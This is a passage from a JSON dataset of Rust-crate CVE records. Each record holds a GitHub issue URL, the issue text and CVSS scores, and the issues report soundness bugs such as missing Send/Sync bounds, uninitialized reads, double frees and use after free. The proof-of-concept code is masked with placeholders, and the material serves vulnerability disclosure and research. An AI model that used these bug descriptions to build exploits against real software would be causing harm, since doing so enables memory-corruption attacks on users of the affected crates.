        "Issue_Created_At": "2021-01-07T03:14:36Z",
        "description": "APITAG accesses unclaimed/uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG Issue NUMBERTAG Write to unclaimed memory. APITAG is done without reserving extra memory for APITAG . After that, new data is written to the unclaimed memory via APITAG . This seems to be a critical security error, as APITAG can potentially write to memory that is actively occupied by another entity. Issue NUMBERTAG APITAG on uninitialized memory can cause undefined behavior APITAG can potentially pass uninitialized memory to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It would be safe to zero initialize the newly allocated APITAG buffer before APITAG (probably via APITAG ), in order to prevent user provided Read from accessing old contents of the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35925",
        "Issue_Url_old": "https://github.com/johnshaw/magnetic/issues/9",
        "Issue_Url_new": "https://github.com/johnshaw/magnetic/issues/9",
        "Repo_new": "johnshaw/magnetic",
        "Issue_Created_At": "2020-11-29T14:21:34Z",
        "description": "Send bound needed on T (for APITAG impl of APITAG types). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. All queue types (spsc, spmc, mpsc, mpmc) are used to send an object from one thread to another. Currently, APITAG is implemented for producer/consumer types of all queues without a Send bound on T (as below). ERRORTAG This allows users to send non Send objects to other threads, and can potentially let users write safe Rust code that trigger undefined behavior. Here is a proof of concept that invokes undefined behavior using this crate. Due to the data race on the internal reference count of Rc , the program below either crashes at runtime (On Ubuntu, APITAG ) or panics at the end of the program (indicating a memory leak). ERRORTAG In order to prevent this undefined behavior, we need a Send bound on T for both APITAG impls of producer/consumer types. Send bound is needed for impl Sync , due to the fact that it is possible to send objects to other threads by holding a reference to APITAG types. I made a fix that lets the compiler revoke programs like the above, and I'll submit a PR right away. Please let us know what you think about the issue or the fix. Thank you for checking out this issue :crab:",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-16143",
        "Issue_Url_old": "https://github.com/RustCrypto/MACs/issues/19",
        "Issue_Url_new": "https://github.com/rustcrypto/macs/issues/19",
        "Repo_new": "rustcrypto/macs",
        "Issue_Created_At": "2019-08-25T21:27:52Z",
        "description": "Incorrect digest with hmac blake2s. I seem to be getting incorrect results when using the hmac URLTAG crate with blake2s URLTAG . I have verified that the implementation of the hash functions themselves behave identically. HMAC Blake2s : mismatching output APITAG the empty message with the empty key, using Go APITAG for reference: CODETAG Go Playground URLTAG Outputs APITAG ERRORTAG Outputs APITAG HMAC SHA NUMBERTAG identical output The same behaviour does not occur when instantiating HMAC with SHA NUMBERTAG CODETAG Go Playgound URLTAG Outputs APITAG ERRORTAG Outputs APITAG I have reason to believe the Rust implementation is at fault: the Go code is used in APITAG and successfully performs cryptographic handshakes with other compatible clients.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35901",
        "Issue_Url_old": "https://github.com/actix/actix-web/issues/1321",
        "Issue_Url_new": "https://github.com/actix/actix-web/issues/1321",
        "Repo_new": "actix/actix-web",
        "Issue_Created_At": "2020-01-24T19:02:37Z",
        "description": "Undefined behavior due to unsafe pinning of APITAG Expected Behavior The program below should not segfault when I only write 'safe' code. Current Behavior The program below segfaults. Possible Solution Change the APITAG trait to take a APITAG instead of a APITAG . Steps to Reproduce (for bugs) Run the following code in debug mode. ERRORTAG Context I found this problem by searching for 'unsafe' in the actix web repo. Rust Version (I.e, output of APITAG ): rustc NUMBERTAG nightly Actix Web Version: actix http NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36441",
        "Issue_Url_old": "https://github.com/SonicFrog/abox/issues/1",
        "Issue_Url_new": "https://github.com/sonicfrog/abox/issues/1",
        "Repo_new": "sonicfrog/abox",
        "Issue_Created_At": "2020-11-10T19:39:29Z",
        "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36437",
        "Issue_Url_old": "https://github.com/longshorej/conqueue/issues/9",
        "Issue_Url_new": "https://github.com/longshorej/conqueue/issues/9",
        "Repo_new": "longshorej/conqueue",
        "Issue_Created_At": "2020-11-24T19:46:07Z",
        "description": "APITAG Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG However, this should probably be bounded by T: Sync and T: Send. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a APITAG . ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35876",
        "Issue_Url_old": "https://github.com/spacejam/rio/issues/11",
        "Issue_Url_new": "https://github.com/spacejam/rio/issues/11",
        "Repo_new": "spacejam/rio",
        "Issue_Created_At": "2020-02-07T10:19:46Z",
        "description": "mem::forget(completion) unsafety? . It seems to me that the soundness of Completion relies on the fact that it waits for the operation to complete in its Drop impl. But per the leakpocalypse it's safe to just forget the completion, side stepping that?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36463",
        "Issue_Url_old": "https://github.com/schets/multiqueue/issues/31",
        "Issue_Url_new": "https://github.com/schets/multiqueue/issues/31",
        "Repo_new": "schets/multiqueue",
        "Issue_Created_At": "2020-12-26T01:55:23Z",
        "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab: , I recently submitted a bug report to the FILETAG crate which is maintained from a fork of this crate. The bug was fixed a few days ago in version NUMBERTAG The exact same bug exists for the multiqueue crate as well. FYI, I'll leave a link to the bug report that I submitted for the APITAG crate: URLTAG Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35921",
        "Issue_Url_old": "https://github.com/yoshuawuyts/miow/issues/38",
        "Issue_Url_new": "https://github.com/yoshuawuyts/miow/issues/38",
        "Repo_new": "yoshuawuyts/miow",
        "Issue_Created_At": "2020-11-13T22:59:52Z",
        "description": "Invalidly assumes the memory layout of APITAG miow assumes that the memory layout of APITAG matches APITAG , but this can't be assumed. std makes no such promise to the outside world. The offending code is here: URLTAG Some other crates made the same assumptions, and they are being fixed in URLTAG URLTAG and URLTAG Until this is fixed and published it kind of blocks moving these fundamental network types into core and also stops them from having const fn constructors. See this PR on std for reference: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35920",
        "Issue_Url_old": "https://github.com/rust-lang/socket2-rs/issues/119",
        "Issue_Url_new": "https://github.com/rust-lang/socket2/issues/119",
        "Repo_new": "rust-lang/socket2",
        "Issue_Created_At": "2020-11-06T07:44:14Z",
        "description": "The code invalidly assumes the memory layout of APITAG This library casts APITAG (and APITAG ) into APITAG : URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes. This internals forum thread is where this discussion started: URLTAG mio does the same kind of invalid casting: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35928",
        "Issue_Url_old": "https://github.com/kanidm/concread/issues/48",
        "Issue_Url_new": "https://github.com/kanidm/concread/issues/48",
        "Repo_new": "kanidm/concread",
        "Issue_Created_At": "2020-11-13T22:24:55Z",
        "description": "APITAG bound needed on V in APITAG . Hello! :crab: While scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send & Sync for APITAG is implemented as below. ERRORTAG In the Send impl, there is no Send bound on V . In the Sync impl, there is no Sync bound on V . It is possible to insert a non Sync item to APITAG and share it across multiple threads. Proof of Concept I wrote a minimal proof of concept that exploits this issue to cause undefined behavior in safe Rust. To observe undefined behavior, you need to run the below program in Debug mode. In the program below, multiple threads clone & drop Rc ( neither Send nor Sync ) which is inside APITAG . Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (memory leak) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix the issue? I think this issue can be solved by adding APITAG bounds to the current APITAG impls as below. ERRORTAG Thank you for checking out this issue NUMBERTAG cat:",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-35900",
        "Issue_Url_old": "https://github.com/raviqqe/array-queue/issues/2",
        "Issue_Url_new": "https://github.com/raviqqe/array-queue/issues/2",
        "Repo_new": "raviqqe/array-queue",
        "Issue_Created_At": "2020-09-26T07:44:59Z",
        "description": "array_queue pop_back should be indexed with index method.. In the APITAG function, APITAG is used as the index: URLTAG This means that after you perform a APITAG there is the potential to read from uninitialized or previously dropped memory. This can lead to a double drop and an arbitrary read primitive from safe rust. Here's a program that exhibits the read behavior: ERRORTAG The second part is a bit harder to fix. Rust now has a type called ERRORTAG that is used to safely initialize types in uninitialized memory. I'd recommend at least fixing the index problem in APITAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36219",
        "Issue_Url_old": "https://github.com/reem/rust-atomic-option/issues/4",
        "Issue_Url_new": "https://github.com/reem/rust-atomic-option/issues/4",
        "Repo_new": "reem/rust-atomic-option",
        "Issue_Created_At": "2020-10-31T20:00:59Z",
        "description": "APITAG should have Sync bound on its type argument.. Currently APITAG implements Sync for any type. However, this should really be bounded by APITAG , otherwise it allows for types that were never meant to be used across threads to be smuggled across boundaries. APITAG found by APITAG See this example of using APITAG to use a Cell across thread boundaries, leading to an arbitrary pointer dereference: ERRORTAG Output: APITAG Return Code NUMBERTAG SIGSEGV)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-29935",
        "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1534",
        "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1534",
        "Repo_new": "sergiobenitez/rocket",
        "Issue_Created_At": "2021-02-09T22:35:40Z",
        "description": "Unsafe code in Formatter is not panic safe. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method converts APITAG to APITAG with the justification above. Unfortunately, the prefix is not popped if line NUMBERTAG panics. In such case, the transmuted APITAG persists in prefixes field and will lead to use after free if the formatter is accessed again. Reproduction Below is an example program that demonstrates use after free using safe APIs of APITAG . APITAG Detail APITAG APITAG The program is expected to write APITAG . However, due to the aforementioned use after free, it prints APITAG instead. ERRORTAG Output: CODETAG Tested Environment Crate: rocket_http Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG nightly NUMBERTAG caa NUMBERTAG d NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36445",
        "Issue_Url_old": "https://github.com/krl/convec/issues/2",
        "Issue_Url_new": "https://github.com/krl/convec/issues/2",
        "Repo_new": "krl/convec",
        "Issue_Created_At": "2020-11-24T18:41:35Z",
        "description": "APITAG lacks a bound on its Send trait and Sync trait. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG This allows objects like Cell that doesn't implement Sync to be shared across threads leading to undefined behavior. The code below crashes due to the data race. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-26953",
        "Issue_Url_old": "https://github.com/bodoni/postscript/issues/1",
        "Issue_Url_new": "https://github.com/bodoni/postscript/issues/1",
        "Repo_new": "bodoni/postscript",
        "Issue_Created_At": "2021-01-31T01:10:10Z",
        "description": "Read on uninitialized buffer may cause UB ( APITAG ). Hello fellow :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36460",
        "Issue_Url_old": "https://github.com/spacejam/model/issues/3",
        "Issue_Url_new": "https://github.com/spacejam/model/issues/3",
        "Repo_new": "spacejam/model",
        "Issue_Created_At": "2020-11-10T19:58:34Z",
        "description": "Possible soundness issue in Shared?. Hi there, we (the Rust group at APITAG gatech) are auditing crates on crates.io for safety issues and noticed that the Shared object seems to not have bounds on its Send / Sync traits: URLTAG We weren't sure if this was intentional since this is a testing library but this can be used to create data races from safe Rust by sharing types like Cell : ERRORTAG which outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35864",
        "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5825",
        "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5825",
        "Repo_new": "google/flatbuffers",
        "Issue_Created_At": "2020-03-20T16:51:02Z",
        "description": "Rust: read_scalar(_at) is unsound. The APITAG and APITAG functions are unsound because the allow to do things such as: APITAG or CODETAG or even worse: CODETAG (this last one causes a segmentation fault) APITAG is behaving similar to transmute , leading to undefined behavior for types where not all bit patterns are valid (such as bool or APITAG ) or allowing to create dangling pointers. I suggest three breaking solutions: Make APITAG and APITAG functions unsafe. Make the APITAG trait unsafe. Make the APITAG trait something like: APITAG which, for example, would be implemented for APITAG like this: CODETAG This last solution, even though it is the most disrupting one, has the advantage of not requiring any ERRORTAG at all.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36435",
        "Issue_Url_old": "https://github.com/RusPiRo/ruspiro-singleton/issues/10",
        "Issue_Url_new": "https://github.com/ruspiro/ruspiro-singleton/issues/10",
        "Repo_new": "ruspiro/ruspiro-singleton",
        "Issue_Created_At": "2020-11-16T16:57:41Z",
        "description": "Singleton needs bounds on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Singleton implements Send and Sync unconiditionally: URLTAG This is guarded by a APITAG but violates APITAG 's own assumptions that Send will have APITAG and Sync will be APITAG . The way this is structured right now allows for data races from safe Rust code, for example: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36453",
        "Issue_Url_old": "https://github.com/rossdylan/rust-scottqueue/issues/1",
        "Issue_Url_new": "https://github.com/rossdylan/rust-scottqueue/issues/1",
        "Repo_new": "rossdylan/rust-scottqueue",
        "Issue_Created_At": "2020-11-15T08:47:30Z",
        "description": "Queue APITAG should have a Send bound on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Queue object implements Send and Sync unconiditionally: URLTAG However, this should probably be bounded by APITAG in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-25906",
        "Issue_Url_old": "https://github.com/liebharc/basic_dsp/issues/47",
        "Issue_Url_new": "https://github.com/liebharc/basic_dsp/issues/47",
        "Repo_new": "liebharc/basic_dsp",
        "Issue_Created_At": "2021-01-11T02:06:52Z",
        "description": "panic safety issue in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The issue is relevant to implementation of APITAG trait for APITAG , APITAG , and APITAG . URLTAG URLTAG If a panic happens within conversion , item( S ) within self can be dropped twice since the ownership of the item within self is duplicated with APITAG . Suggested Fix By keeping self within APITAG instead of using APITAG , it is possible to guard against such double drop bugs. I will immediately submit a PR containing the suggested fix. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35860",
        "Issue_Url_old": "https://github.com/TomBebbington/cbox-rs/issues/2",
        "Issue_Url_new": "https://github.com/tombebbington/cbox-rs/issues/2",
        "Repo_new": "tombebbington/cbox-rs",
        "Issue_Created_At": "2020-03-06T17:16:52Z",
        "description": "Soundness bug. Getting a segmentation fault is as easy as: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35924",
        "Issue_Url_old": "https://github.com/mpdn/try-mutex/issues/2",
        "Issue_Url_new": "https://github.com/mpdn/try-mutex/issues/2",
        "Repo_new": "mpdn/try-mutex",
        "Issue_Created_At": "2020-11-16T19:18:09Z",
        "description": "APITAG should have Send bound on T. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Sync for all types T : URLTAG This should probably be bounded by APITAG just like the standard library's Mutex URLTAG , otherwise it allows smuggling non Send types like Rc across thread boundaries like so: ERRORTAG This outputs: APITAG and can lead to data races from safe Rust code.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-36470",
        "Issue_Url_old": "https://github.com/sklose/disrustor/issues/1",
        "Issue_Url_new": "https://github.com/sklose/disrustor/issues/1",
        "Repo_new": "sklose/disrustor",
        "Issue_Created_At": "2020-12-18T03:45:39Z",
        "description": "APITAG allows sending Non Send types across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG APITAG implements APITAG regardless of whether the internal type implements APITAG This allows users to send a non Send type across threads with APITAG . APITAG 's APITAG should probably have a trait bound on the internal type T , or if APITAG needs to implement APITAG and it is not meant to be created by the end user, APITAG should be hidden with APITAG or so. Reproduction Below is an example program that sends Non Send type across threads using safe APIs of disrustor . APITAG Detail APITAG APITAG This example just shows that non Send type is sent across the thread, but it is possible to demonstrate a data race with a more complicated example. ERRORTAG Output: ERRORTAG Tested Environment Crate: disrustor Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-45711",
        "Issue_Url_old": "https://github.com/acw/simple_asn1/issues/27",
        "Issue_Url_new": "https://github.com/acw/simple_asn1/issues/27",
        "Repo_new": "acw/simple_asn1",
        "Issue_Created_At": "2021-11-14T14:37:35Z",
        "description": "Panic when decoding an invalid APITAG Hello, I hope this is the right place to report this; I didn't find any documentation for a preferred method for reporting security issues. The following code panics when trying to parse an invalid APITAG object: CODETAG The panic occurs because of these line in lib.rs: APITAG If the string is constructed in such a way that the first two bytes do not end on a character boundary, the slide operation will panic. Found by fuzzing a downstream library. I'll submit a patch ASAP.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35916",
        "Issue_Url_old": "https://github.com/image-rs/image/issues/1357",
        "Issue_Url_new": "https://github.com/image-rs/image/issues/1357",
        "Repo_new": "image-rs/image",
        "Issue_Created_At": "2020-11-12T11:39:33Z",
        "description": "Undefined behavior detected by miri. I just discovered an UB whilst testing another project with miri. APITAG and APITAG perform an invalid unsafe cast, which is detected by miri. Expected APITAG should not raise any problem. Actual behaviour APITAG triggers UB. Reproduction steps Just run miri on tests :relaxed:",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20991",
        "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/96",
        "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/96",
        "Repo_new": "servo/rust-smallvec",
        "Issue_Created_At": "2018-05-17T15:33:23Z",
        "description": "APITAG is unsound. Gist here URLTAG . A solution to this would be to set APITAG before iterating. Obviously this would cause leaks but we're already leaking data.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31996",
        "Issue_Url_old": "https://github.com/AbrarNitk/algorithmica/issues/1",
        "Issue_Url_new": "https://github.com/abrarnitk/algorithmica/issues/1",
        "Repo_new": "abrarnitk/algorithmica",
        "Issue_Created_At": "2021-03-07T14:46:16Z",
        "description": "APITAG crashes with double free for APITAG . Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The implementation of APITAG freely duplicates ownership of items from list , and invokes drop of the duplicated items via APITAG . Also, panic within APITAG can also trigger double free of items whose ownership was duplicated via APITAG . URLTAG Reproduction Below is an example program that exhibits undefined behavior using safe APIs of algorithmica . Simply calling APITAG on an array of APITAG triggers double free. APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: algorithmica Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29933",
        "Issue_Url_old": "https://github.com/rphmeier/insert_many/issues/1",
        "Issue_Url_new": "https://github.com/rphmeier/insert_many/issues/1",
        "Repo_new": "rphmeier/insert_many",
        "Issue_Created_At": "2021-01-26T22:19:07Z",
        "description": "insert_many can double free items if the iterator panics. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a potential issue in the provided APITAG implementation / APITAG macro. Namely, APITAG pushes elements over for insertion using APITAG here: URLTAG This can duplicate items in the Vec, after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG What's happening here is: v = APITAG , length NUMBERTAG Insert many called. v = APITAG , length NUMBERTAG APITAG v = APITAG , length NUMBERTAG APITAG panics APITAG gets dropped twice. We'd recommend wrapping the vector in FILETAG while performing these operations to avoid this issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31919",
        "Issue_Url_old": "https://github.com/djkoloski/rkyv/issues/113",
        "Issue_Url_new": "https://github.com/rkyv/rkyv/issues/113",
        "Repo_new": "rkyv/rkyv",
        "Issue_Created_At": "2021-04-29T02:34:47Z",
        "description": "Archives may contain uninitialized memory. During serialization, struct padding bytes and unused enum bytes may not be initialized. These bytes may be written to disk or sent over unsecured channels. This issue has been fixed as of NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36434",
        "Issue_Url_old": "https://github.com/FillZpp/sys-info-rs/issues/63",
        "Issue_Url_new": "https://github.com/fillzpp/sys-info-rs/issues/63",
        "Repo_new": "fillzpp/sys-info-rs",
        "Issue_Created_At": "2020-06-01T03:05:07Z",
        "description": "Disk Info is not Thread Safe. I've seen a few segmentation faults when running APITAG on linux. If you call APITAG from multiple threads at once this can core dump: CODETAG There is a global APITAG : URLTAG Which, if two threads are calling APITAG the APITAG call at the end of the APITAG function will both try and free at the same time: URLTAG This results in segfaults & also double frees",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45710",
